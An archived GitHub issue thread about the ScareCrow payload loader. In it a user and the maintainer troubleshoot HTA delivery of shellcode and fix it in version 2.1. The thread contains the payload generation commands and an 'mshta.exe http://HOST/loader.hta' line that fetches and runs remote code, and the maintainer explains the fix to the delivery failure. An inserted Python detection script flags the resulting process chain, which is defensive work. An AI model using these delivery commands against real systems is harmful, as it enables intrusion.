This repository has been archived by the owner on Aug 18, 2023. It is now read-only.

HTA delivery failing with remote URL #14

Closed
zyk11 opened this issue May 25, 2021 · 8 comments

Comments

zyk11 commented May 25, 2021

When executing the HTA delivery file (for both control and excel loaders) passing a remote URL where the HTA file is hosted does nothing. On the other hand, if the HTA file is already located on disk, the shellcode is executed successfully.

Monitoring through Process Explorer for control, you can see that control.exe is spawned which then calls rundll32.exe. This never happens when a remote URL is passed instead.

HTA file generated via:
/opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader control -O loader.hta -delivery hta -url <url> -domain <domain>
OR
/opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader excel -O loader.hta -delivery hta -url <url> -domain <domain>

Control/Excel Loader executed via:
mshta.exe http://HOST/loader.hta --> does not work
mshta.exe C:\Windows\Tasks\loader.hta --> works
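The process chain described in this report (mshta.exe launching control.exe, which in turn calls rundll32.exe to load the rebuilt .cpl) is what a defender would key a detection on. The following is an added example, not part of the issue or of the ScareCrow project: it reconstructs parent/child ancestry from constructed Sysmon-style process-creation records and flags both a remote-URL mshta.exe launch and a rundll32.exe whose ancestry runs through control.exe and then mshta.exe. Field names (pid, ppid, image, cmd) and all sample paths are assumptions.

```python
"""Flag the mshta.exe -> control.exe -> rundll32.exe chain in process events."""

# Constructed sample events mimicking Sysmon Event ID 1 fields; not from a real host.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://HOST/loader.hta"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\control.exe",
     "cmd": r"control.exe C:\Users\u\AppData\Local\Temp\x.cpl"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL C:\Users\u\AppData\Local\Temp\x.cpl"},
    # Benign: control.exe -> rundll32.exe also happens when a user opens a Control Panel
    # applet from Explorer, so that pair alone is not enough to alert on.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\control.exe",
     "cmd": "control.exe /name Microsoft.NetworkAndSharingCenter"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": "rundll32.exe shell32.dll,Control_RunDLL"},
]


def image_name(event: dict) -> str:
    """Lower-cased file name of the process image, e.g. 'mshta.exe'."""
    return event["image"].rsplit("\\", 1)[-1].lower()


def ancestry(events: list, pid: int) -> list:
    """Image names from the given process up through its ancestors (self first)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # stop at unknown parent or pid reuse loop
        seen.add(pid)
        chain.append(image_name(by_pid[pid]))
        pid = by_pid[pid]["ppid"]
    return chain


def find_alerts(events: list) -> list:
    """Return (pid, reason) tuples for the two behaviours described in the report."""
    alerts = []
    for e in events:
        name, cmd = image_name(e), e["cmd"].lower()
        if name == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
            alerts.append((e["pid"], "mshta.exe launched with remote URL"))
        if name == "rundll32.exe":
            chain = ancestry(events, e["pid"])
            # Require control.exe to sit between rundll32.exe and mshta.exe in the tree.
            if "control.exe" in chain and "mshta.exe" in chain \
                    and chain.index("control.exe") < chain.index("mshta.exe"):
                alerts.append((e["pid"], "rundll32.exe under control.exe under mshta.exe"))
    return alerts
```

The ancestry check also catches the locally hosted case (mshta.exe C:\Windows\Tasks\loader.hta), since it keys on the process tree rather than on the URL.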

Tylous (Contributor) commented May 25, 2021

So before I can assist, I need to ask: you have two different loaders selected in your two examples. I only ask because one is excel, which would change the situation. Can you please confirm?

zyk11 (Author) commented May 25, 2021

Can you please clarify your question?

I tried both methods (excel and control) separately, and the exhibited behaviour is the same, i.e. the HTA file only executes if it is already located locally.

I analysed what's happening in Process Explorer and noticed that control.exe and rundll32.exe do not spawn when calling the file from a remote URL (for control loader).

Tylous (Contributor) commented May 26, 2021

Okay, I did some testing and it looks like there is some sort of issue with it pulling a large file over via mshta. I am going to do some more testing to address this but it might require a different template for mshta.

Tylous (Contributor) commented May 26, 2021

Update: I have a working PoC. I am not 100% sure what it was, but it was related to the rebuilding of the .cpl file on disk. I am gonna do some more testing but I should have an update in a day to address this.

zyk11 (Author) commented May 26, 2021

Awesome. Would love to hear more about the root cause.

Tylous (Contributor) commented Jun 1, 2021

Code pushed in 2.1. Please try it out.

zyk11 (Author) commented Jun 1, 2021

Just tested it out using the Control loader and HTA delivery, and it worked perfectly when calling it with mshta.exe.
May I ask what the issue was with the original code and how you fixed it?

Thanks a lot! This framework is underrated :)

Tylous (Contributor) commented Jun 3, 2021

Sorry for the delay. It looks like when the file is being pulled remotely the COM object "ADODB.Stream" times out due to some slowness (probably because mshta uses Internet Explorer COM objects to download content) and loading the base64-encoded payload into memory to then convert. By changing the serialized format and omitting the use of ADODB.Stream it worked.

I am glad it worked for you and thank you very much I appreciate the feedback.

Tylous closed this as completed Jun 3, 2021